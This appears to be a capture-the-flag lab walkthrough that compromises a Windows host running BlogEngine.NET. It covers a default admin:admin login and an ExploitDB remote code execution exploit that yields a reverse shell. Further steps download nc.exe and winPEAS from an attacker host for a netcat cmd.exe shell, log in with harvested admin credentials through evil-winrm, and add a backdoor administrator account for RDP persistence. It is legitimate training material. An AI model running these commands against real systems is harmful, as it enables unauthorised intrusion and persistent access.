As always we start with a nmap scan
nmap -A 172.31.1.16
As you can see we have a web server running on port 80, SMB on 445, and RDP on 3389. We can note that the machine’s name is ENGINE for further reference. Let’s continue on.
We are going to start by checking out the webserver on Port 80, however we get a default page.
Default Windows IIS Webpage
This is actually a pretty common occurrence in a penetration test, and can oftentimes be running services within subdirectories. We can check for the possibility of this using Dirsearch.
python3 dirsearch.py -u 172.31.1.16 -e php,cgi,txt,exe,html -x 400,401,403 -r -R 3
Dirsearch has successfully located additional directories, and in this case specifically the /blog directory. Let’s check that out in the browser now and see what we find.
We can see a page named “Alex’s Blog,” which appears to be running BlogEngine.net. Additionally, we can attempt to log in by clicking the login button in the submenu above.
BlogEngine Login page for Alex’s Blog
I attempted to use default credentials I found online, but they were unsuccessful. However, trying the tried and true “admin:admin” worked, and we successfully gained access to the administrator dashboard. Let’s go back to the BlogEngine service we discovered earlier, and do some research. Searchsploit shows the following results.
BlogEngine appears to be vulnerable to directory traversal and remote code execution. Let‘s do some research and see if one of these exploits can help us gain access. After some searching we do find that one of them (46353.cs) seems to fit our needs.
ExploitDB BlogEngine.NET 3.3.6 Exploit
Now that we have a possible exploit we need to figure out how to use it. Fortunately this one is pretty straight forward. We can copy it from our ExploitDB folder on Kali to our working directory and inspect it’s requirements.
Copying 46353.cs from ExploitDB directory to our working directory
So there’s a couple of things here. First, we see in the bottom that we have to modify the IP address and port. In the top we are instructed to save the file as “PostView.ascx” as this is the format that the BlogEngine service will recognize. So modify as required, and save the file. Once you’ve done this we can move ahead.
Now navigate through the dashboard to the edit menu for the one single post we can locate on the server.
Choose the post above
Click the File Manager button as shown above
From here you should see an upload button. Select that, and upload your “PostView.ascx” file.
Now that the file is uploaded we need to navigate to the directory that we are shown in the exploit file. But first, start a Netcat listener listening on the port we specified in the exploit. If you’ve followed the instructions correctly, you should get a reverse shell when you visit the site.
Reverse Shell – http://172.31.1.16/blog/?theme=../../App_Data/files
You’ll notice that the shell is funky and would benefit from an upgrade. I do this by grabbing my Netcat binary using Powershell to get it from our Kali machine. Remember to start your Python SimpleHTTPServer as well.
Bottom – python -m SimpleHTTPServer 8181; Top – powershell -c wget “http://10.10.0.7:8181/nc.exe” -outfile “nc.exe”
You can now start another Netcat listener on Kali, and run nc.exe from the target machine to connect back. Let’s do that now.
Bottom – nc -nlvp 5555; Top – nc.exe 10.10.0.7 5555 -e cmd.exe
Great! We now have a more stable shell. Unfortunately we find quickly that we do not have access privileges to the user or Admin folders. We will need to escalate privileges.
User folder access denied
We can use various methods to determine ways to escalate. In this case I used winPEAS. Let’s grab that from our Tools folder on our Kali machine and run it.
powershell -c wget “http://10.10.0.7:8181/winPEAS.exe” -outfile “winPEAS.exe”; winpeas.exe
We let winPEAS do it’s thing, and once it’s complete we can go through the results. One thing sticks out, which is some default credentials that have been found hiding in registry.
Default Credentials Found
Now that we have what appears to be Administrator credentials we can attempt to log in with them. Noting that we early found SMB running on the machine we can use psexec or, in the case of this walkthrough, Evil-WinRM.
evil-winrm -i 172.31.1.16 -u administrator -p PzCEKhvj6gQMk7kA -s /root/Desktop/Tools
You’ll notice that whoami returns administrator, which is what we hoped for. Additionally, please make note of my use of the -s flag with the follow on directory. This allows me you to run scripts and programs directly from the Tools directory on your Kali machine. Neat trick! Let’s grab our flags quick.
access.txt and system.txt flags found
If you’re here for just the flags, then congratulations! You have completed the challenge and can submit the hashes to the CSL dashboard for the machine. If you are interested in some basic post-exploitation, then please continue on.
Now that we have administrative access we can think about how we can provide continued access in the future. As with previous guides, we can simply create a user and add them to the administrator group.
net user themayor !Password!123 /add; net localgroup Administrators themayor /add
We saw earlier that RDP is already enabled, so we don’t need to enable it and can simply attempt to log in using XFreeRDP.
xfreerdp /u:themayor /p’!Password!123′ /v:172.31.1.16
And we are successfully in the Server 2012 environment. Open up the server manager quick to verify that we are in the Administrator’s group and you’re all set.